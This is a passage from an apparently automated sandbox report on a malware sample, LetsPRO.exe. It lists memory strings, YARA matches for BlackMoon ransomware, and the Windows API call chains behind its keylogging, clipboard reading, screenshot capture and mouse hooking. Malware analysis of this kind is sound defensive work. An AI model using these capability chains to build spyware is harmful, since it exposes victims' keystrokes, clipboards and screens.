0000001E.00000003.2112537399.0000000000BB8000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2124671357.0000000000BC8000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2105591928.0000000000BB4000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2169446695.0000000000B8D000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2117894739.0000000000BB8000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2148667940.0000000000BB4000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2131161784.0000000000BC8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0A
Source: ChromeSetup.exe, 00000010.00000003.2040369150.0000000002622000.00000004.00000020.00020000.00000000.sdmp, ChromeSetup.exe, 00000010.00000002.3262108532.00000000008C4000.00000004.00000010.00020000.00000000.sdmp, ChromeSetup.exe, 00000010.00000003.2052523168.0000000002E3E000.00000004.00000020.00020000.00000000.sdmp, ChromeSetup.exe, 00000010.00000003.2027981096.0000000002623000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2119985698.0000000000BB8000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2106070949.0000000000BB4000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2113272279.0000000000BC8000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2169549013.0000000000BB4000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2126078995.0000000000BB8000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2114814698.0000000000BB8000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2114661237.0000000000BC8000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2105240305.0000000000BC4000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2131988902.0000000000BB8000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2112537399.0000000000BB8000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2124671357.0000000000BC8000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2105591928.0000000000BB4000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2169446695.0000000000B8D000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2117894739.0000000000BB8000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2148667940.0000000000BB4000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2131161784.0000000000BC8000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2104723408.0000000000BB4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0C
Source: ChromeSetup.exe, 00000010.00000003.2040369150.0000000002622000.00000004.00000020.00020000.00000000.sdmp, ChromeSetup.exe, 00000010.00000002.3262108532.00000000008C4000.00000004.00000010.00020000.00000000.sdmp, ChromeSetup.exe, 00000010.00000003.2052523168.0000000002E3E000.00000004.00000020.00020000.00000000.sdmp, ChromeSetup.exe, 00000010.00000003.2027981096.0000000002623000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2119985698.0000000000BB8000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2106070949.0000000000BB4000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2113272279.0000000000BC8000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2169549013.0000000000BB4000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2126078995.0000000000BB8000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2114814698.0000000000BB8000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2114661237.0000000000BC8000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2105240305.0000000000BC4000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2131988902.0000000000BB8000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2112537399.0000000000BB8000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2124671357.0000000000BC8000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2105591928.0000000000BB4000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2169446695.0000000000B8D000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2117894739.0000000000BB8000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2148667940.0000000000BB4000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2131161784.0000000000BC8000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2104723408.0000000000BB4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0X
Source: ChromeSetup.exe, 00000010.00000003.2040369150.0000000002622000.00000004.00000020.00020000.00000000.sdmp, ChromeSetup.exe, 00000010.00000002.3262108532.00000000008C4000.00000004.00000010.00020000.00000000.sdmp, ChromeSetup.exe, 00000010.00000003.2082869846.0000000000AC9000.00000004.00000020.00020000.00000000.sdmp, ChromeSetup.exe, 00000010.00000003.2052523168.0000000002E3E000.00000004.00000020.00020000.00000000.sdmp, ChromeSetup.exe, 00000010.00000003.2027981096.0000000002623000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2119985698.0000000000BB8000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2106070949.0000000000BB4000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2113272279.0000000000BC8000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2169549013.0000000000BB4000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2126078995.0000000000BB8000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2114814698.0000000000BB8000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2114661237.0000000000BC8000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2105240305.0000000000BC4000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2131988902.0000000000BB8000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2112537399.0000000000BB8000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2124671357.0000000000BC8000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2169446695.0000000000B8D000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2117894739.0000000000BB8000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2148667940.0000000000BB4000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2131161784.0000000000BC8000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2104723408.0000000000BB4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.digicert.com/CPS0
Source: GoogleUpdate.exe String found in binary or memory: https://clients2.google.com/cr/report
Source: GoogleUpdate.exe, 0000001E.00000002.3271726771.000000006CE05000.00000002.00000001.01000000.00000009.sdmp String found in binary or memory: https://clients2.google.com/cr/reportcheckpointGoogle
Source: GoogleUpdate.exe String found in binary or memory: https://clients2.google.com/service/check2?crx3=true
Source: GoogleUpdate.exe, 0000001E.00000002.3271726771.000000006CE05000.00000002.00000001.01000000.00000009.sdmp, GoogleUpdate.exe, 0000001E.00000003.2104207516.00000000057C1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://clients2.google.com/service/check2?crx3=trueSoftware
Source: GoogleUpdate.exe, 0000001E.00000002.3271726771.000000006CE05000.00000002.00000001.01000000.00000009.sdmp, GoogleUpdate.exe, 0000001E.00000003.2104207516.00000000057C1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://dl.google.com/update2/installers/icons/https://m.google.com/devicemanagement/data/apiLastCod
Source: GoogleUpdate.exe String found in binary or memory: https://m.google.com/devicemanagement/data/api
Source: GoogleUpdate.exe String found in binary or memory: https://update.googleapis.com/service/update2
Source: GoogleUpdate.exe, 0000001E.00000002.3261720735.0000000000B40000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://update.googleapis.com/service/update22F
Source: GoogleUpdate.exe, 0000001E.00000002.3271726771.000000006CE05000.00000002.00000001.01000000.00000009.sdmp, GoogleUpdate.exe, 0000001E.00000003.2104207516.00000000057C1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://update.googleapis.com/service/update2https://www.google.com/support/installer/?
Source: GoogleUpdate.exe String found in binary or memory: https://www.google.com/support/installer/?
Source: unknown Network traffic detected: HTTP traffic on port 49719 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49719
Source: unknown Network traffic detected: HTTP traffic on port 49716 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49716

Key, Mouse, Clipboard, Microphone and Screen Capturing
barindex
Contains functionality to capture and log keystrokes
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe Code function: [esc] 4_2_03F3E850
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe Code function: [esc] 4_2_03F3E850
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe Code function: [esc] 4_2_03F3E850
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe Code function: [esc] 4_2_03F3E850
Contains functionality for read data from the clipboard
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe Code function: 4_2_03F3E850 Sleep,CreateMutexW,GetLastError,_memset,Sleep,GetTickCount,GetTickCount,GetTickCount,InterlockedExchange,OpenClipboard,GetClipboardData,GlobalSize,GlobalLock,wsprintfW,_memset,GlobalUnlock,CloseClipboard,WaitForSingleObject,CreateFileW,SetFilePointer,lstrlenW,WriteFile,CloseHandle,ReleaseMutex,GetKeyState,lstrlenW,wsprintfW,lstrlenW,lstrlenW,wsprintfW,wsprintfW,wsprintfW,lstrlenW,WaitForSingleObject,CreateFileW,SetFilePointer,lstrlenW,WriteFile,CloseHandle,ReleaseMutex, 4_2_03F3E850
Contains functionality to modify clipboard data
Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe Code function: 30_2_6CCA3E5C lstrlenW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,GlobalFree,CloseClipboard, 30_2_6CCA3E5C
Contains functionality to read the clipboard data
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe Code function: 4_2_03F3E850 Sleep,CreateMutexW,GetLastError,_memset,Sleep,GetTickCount,GetTickCount,GetTickCount,InterlockedExchange,OpenClipboard,GetClipboardData,GlobalSize,GlobalLock,wsprintfW,_memset,GlobalUnlock,CloseClipboard,WaitForSingleObject,CreateFileW,SetFilePointer,lstrlenW,WriteFile,CloseHandle,ReleaseMutex,GetKeyState,lstrlenW,wsprintfW,lstrlenW,lstrlenW,wsprintfW,wsprintfW,wsprintfW,lstrlenW,WaitForSingleObject,CreateFileW,SetFilePointer,lstrlenW,WriteFile,CloseHandle,ReleaseMutex, 4_2_03F3E850
Contains functionality to record screenshots
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe Code function: 4_2_03F3BC70 GetDesktopWindow,GetDC,GetDC,CreateCompatibleDC,GetDC,GetDeviceCaps,GetDeviceCaps,GetDeviceCaps,ReleaseDC,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,CreateCompatibleBitmap,SelectObject,SetStretchBltMode,GetSystemMetrics,GetSystemMetrics,StretchBlt,_memset,GetDIBits,_memset,DeleteObject,DeleteObject,ReleaseDC,DeleteObject,DeleteObject,ReleaseDC, 4_2_03F3BC70
Creates a DirectInput object (often for capturing keystrokes)
Source: LetsPRO.exe Binary or memory string: DirectInput8Create
Installs a global mouse hook
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe Windows user hook set: 0 mouse low level C:\Windows\SYSTEM32\DINPUT8.dll Jump to behavior

Spam, unwanted Advertisements and Ransom Demands
barindex
Yara detected BlackMoon Ransomware
Source: Yara match File source: 5.2.LetsPRO.exe.1003c7a7.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.LetsPRO.exe.10020253.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.LetsPRO.exe.10020253.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 19.2.LetsPRO.exe.10020253.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.LetsPRO.exe.1003c7a7.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 31.2.LetsPRO.exe.10020253.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.LetsPRO.exe.1003c7a7.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 26.2.LetsPRO.exe.10020253.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 26.2.LetsPRO.exe.1003c7a7.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.LetsPRO.exe.1003c7a7.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 19.2.LetsPRO.exe.1003c7a7.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.LetsPRO.exe.10020253.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 28.2.LetsPRO.exe.1003c7a7.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.LetsPRO.exe.1003c7a7.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.LetsPRO.exe.10020253.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 31.2.LetsPRO.exe.1003c7a7.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.2.LetsPRO.exe.10020253.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 27.2.LetsPRO.exe.1003c7a7.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.LetsPRO.exe.1003c7a7.16.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 27.2.LetsPRO.exe.10020253.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 28.2.LetsPRO.exe.10020253.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 29.2.LetsPRO.exe.10020253.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.LetsPRO.exe.10020253.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.LetsPRO.exe.10020253.17.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 29.2.LetsPRO.exe.1003c7a7.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.2.LetsPRO.exe.1003c7a7.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000012.00000002.2139779498.0000000010020000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.3274998990.0000000010020000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.2125913800.0000000010020000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000002.2207790099.0000000010020000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001A.00000002.2139832943.0000000010020000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.2127759383.0000000010020000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.2130925911.0000000010020000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001D.00000002.2130966068.0000000010020000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000002.2139603630.0000000010020000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.2133672402.0000000010020000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000002.2139915999.0000000010020000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.2132609857.0000000010020000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001B.00000002.2139674546.0000000010020000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: LetsPRO.exe PID: 4320, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: LetsPRO.exe PID: 4564, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: LetsPRO.exe PID: 5440, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: LetsPRO.exe PID: 4912, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: LetsPRO.exe PID: 5480, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: LetsPRO.exe PID: 5520, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: LetsPRO.exe PID: 412, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: LetsPRO.exe PID: 6408, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: LetsPRO.exe PID: 7224, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: LetsPRO.exe PID: 7232, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: LetsPRO.exe PID: 7268, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: LetsPRO.exe PID: 7284, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: LetsPRO.exe PID: 7380, type: MEMORYSTR
Too many similar processes found
Source: LetsPRO.exe Process created: 50

System Summary
barindex
Malicious sample detected (through community Yara rule)
Source: 5.2.LetsPRO.exe.1003c7a7.2.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables using BlackMoon RunTime Author: ditekSHen
Source: 14.2.LetsPRO.exe.10020253.2.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables using BlackMoon RunTime Author: ditekSHen
Source: 5.2.LetsPRO.exe.10020253.3.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables using BlackMoon RunTime Author: ditekSHen
Source: 19.2.LetsPRO.exe.10020253.2.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables using BlackMoon RunTime Author: ditekSHen
Source: 13.2.LetsPRO.exe.1003c7a7.3.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables using BlackMoon RunTime Author: ditekSHen
Source: 31.2.LetsPRO.exe.10020253.3.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables using BlackMoon RunTime Author: ditekSHen
Source: 14.2.LetsPRO.exe.1003c7a7.3.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables using BlackMoon RunTime Author: ditekSHen
Source: 26.2.LetsPRO.exe.10020253.3.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables using BlackMoon RunTime Author: ditekSHen
Source: 26.2.LetsPRO.exe.1003c7a7.2.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables using BlackMoon RunTime Author: ditekSHen
Source: 15.2.LetsPRO.exe.1003c7a7.2.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables using BlackMoon RunTime Author: ditekSHen
Source: 19.2.LetsPRO.exe.1003c7a7.3.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables using BlackMoon RunTime Author: ditekSHen
Source: 17.2.LetsPRO.exe.10020253.2.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables using BlackMoon RunTime Author: ditekSHen
Source: 28.2.LetsPRO.exe.1003c7a7.3.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables using BlackMoon RunTime Author: ditekSHen
Source: 17.2.LetsPRO.exe.1003c7a7.3.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables using BlackMoon RunTime Author: ditekSHen
Source: 15.2.LetsPRO.exe.10020253.3.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables using BlackMoon RunTime Author: ditekSHen
Source: 31.2.LetsPRO.exe.1003c7a7.2.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables using BlackMoon RunTime Author: ditekSHen
Source: 18.2.LetsPRO.exe.10020253.2.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables using BlackMoon RunTime Author: ditekSHen
Source: 27.2.LetsPRO.exe.1003c7a7.2.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables using BlackMoon RunTime Author: ditekSHen
Source: 4.2.LetsPRO.exe.1003c7a7.16.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables using BlackMoon RunTime Author: ditekSHen
Source: 27.2.LetsPRO.exe.10020253.3.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables using BlackMoon RunTime Author: ditekSHen
Source: 28.2.LetsPRO.exe.10020253.2.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables using BlackMoon RunTime Author: ditekSHen
Source: 29.2.LetsPRO.exe.10020253.2.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables using BlackMoon RunTime Author: ditekSHen
Source: 13.2.LetsPRO.exe.10020253.2.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables using BlackMoon RunTime Author: ditekSHen
Source: 4.2.LetsPRO.exe.10020253.17.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables using BlackMoon RunTime Author: ditekSHen
Source: 29.2.LetsPRO.exe.1003c7a7.3.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables using BlackMoon RunTime Author: ditekSHen
Source: 18.2.LetsPRO.exe.1003c7a7.3.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables using BlackMoon RunTime Author: ditekSHen
Contains functionality to call native functions
Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe Code function: 30_2_6CDBECEA NtdllDefWindowProc_W, 30_2_6CDBECEA
Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe Code function: 30_2_6CDBE87A NtdllDefWindowProc_W,CreateSolidBrush,CreateSolidBrush, 30_2_6CDBE87A
Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe Code function: 30_2_6CCA310D NtDeleteKey, 30_2_6CCA310D
Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe Code function: 30_2_6CCA0203 OpenProcess,NtQueryInformationProcess,ReadProcessMemory,ReadProcessMemory,ReadProcessMemory,ReadProcessMemory,CloseHandle, 30_2_6CCA0203
Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe Code function: 30_2_6CD3E5C8 NtdllDefWindowProc_W, 30_2_6CD3E5C8
Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe Code function: 30_2_6CDBF2E5 NtdllDefWindowProc_W,CreateSolidBrush, 30_2_6CDBF2E5
Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe Code function: 30_2_6CD58759 GetCurrentThreadId,PeekMessageW,CreateTimerQueue,NtdllDefWindowProc_W, 30_2_6CD58759
Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe Code function: 30_2_6CCA012C NtQueryInformationProcess,GetModuleHandleW,GetProcAddress, 30_2_6CCA012C
Contains functionality to communicate with device drivers
Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe Code function: 30_2_6CD42272: CreateFileW,DeviceIoControl,CloseHandle, 30_2_6CD42272
Contains functionality to delete services
Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe Code function: 30_2_6CCA9CE2 OpenSCManagerW,OpenServiceW,DeleteService,CloseServiceHandle,CloseServiceHandle, 30_2_6CCA9CE2
Contains functionality to launch a process as a different user
Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe Code function: 30_2_6CCA07CF CreateProcessAsUserW, 30_2_6CCA07CF
Creates files inside the system directory
Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\5bb04a.msi Jump to behavior
Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\inprogressinstallinfo.ipi Jump to behavior
Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\SourceHash{26E6D275-3FC7-41A2-B8C2-458B639029D2} Jump to behavior
Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSIB403.tmp Jump to behavior
Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSIB404.tmp Jump to behavior
Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSIB54D.tmp Jump to behavior
Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSIB59C.tmp Jump to behavior
Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSIB5FB.tmp Jump to behavior
Source: C:\Program Files (x86)\ChromeSetup.exe File created: C:\Windows\SystemTemp\GUMBC11.tmp Jump to behavior
Source: C:\Program Files (x86)\ChromeSetup.exe File created: C:\Windows\SystemTemp\GUMBC12.tmp Jump to behavior
Source: C:\Program Files (x86)\ChromeSetup.exe File created: C:\Windows\SystemTemp\GUMBC12.tmp Jump to behavior
Source: C:\Program Files (x86)\ChromeSetup.exe File created: C:\Windows\SystemTemp\GUTBC13.tmp Jump to behavior
Source: C:\Program Files (x86)\ChromeSetup.exe File created: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe Jump to behavior
Source: C:\Program Files (x86)\ChromeSetup.exe File created: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleCrashHandler.exe Jump to behavior
Source: C:\Program Files (x86)\ChromeSetup.exe File created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdate.dll Jump to behavior
Source: C:\Program Files (x86)\ChromeSetup.exe File created: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdateBroker.exe Jump to behavior
Source: C:\Program Files (x86)\ChromeSetup.exe File created: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdateOnDemand.exe Jump to behavior
Source: C:\Program Files (x86)\ChromeSetup.exe File created: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdateComRegisterShell64.exe Jump to behavior
Source: C:\Program Files (x86)\ChromeSetup.exe File created: C:\Windows\SystemTemp\GUMBC12.tmp\psmachine.dll Jump to behavior
Source: C:\Program Files (x86)\ChromeSetup.exe File created: C:\Windows\SystemTemp\GUMBC12.tmp\psmachine_64.dll Jump to behavior
Source: C:\Program Files (x86)\ChromeSetup.exe File created: C:\Windows\SystemTemp\GUMBC12.tmp\psuser.dll Jump to behavior
Source: C:\Program Files (x86)\ChromeSetup.exe File created: C:\Windows\SystemTemp\GUMBC12.tmp\psuser_64.dll Jump to behavior
Source: C:\Program Files (x86)\ChromeSetup.exe File created: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleCrashHandler64.exe Jump to behavior
Source: C:\Program Files (x86)\ChromeSetup.exe File created: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdateCore.exe Jump to behavior
Source: C:\Program Files (x86)\ChromeSetup.exe File created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_am.dll Jump to behavior
Source: C:\Program Files (x86)\ChromeSetup.exe File created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_ar.dll Jump to behavior
Source: C:\Program Files (x86)\ChromeSetup.exe File created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_bg.dll Jump to behavior
Source: C:\Program Files (x86)\ChromeSetup.exe File created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_bn.dll Jump to behavior
Source: C:\Program Files (x86)\ChromeSetup.exe File created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_ca.dll Jump to behavior
Source: C:\Program Files (x86)\ChromeSetup.exe File created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_cs.dll Jump to behavior
Source: C:\Program Files (x86)\ChromeSetup.exe File created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_da.dll Jump to behavior
Source: C:\Program Files (x86)\ChromeSetup.exe File created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_de.dll Jump to behavior
Source: C:\Program Files (x86)\ChromeSetup.exe File created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_el.dll Jump to behavior
Source: C:\Program Files (x86)\ChromeSetup.exe File created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_en.dll Jump to behavior
Source: C:\Program Files (x86)\ChromeSetup.exe File created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_en-GB.dll Jump to behavior
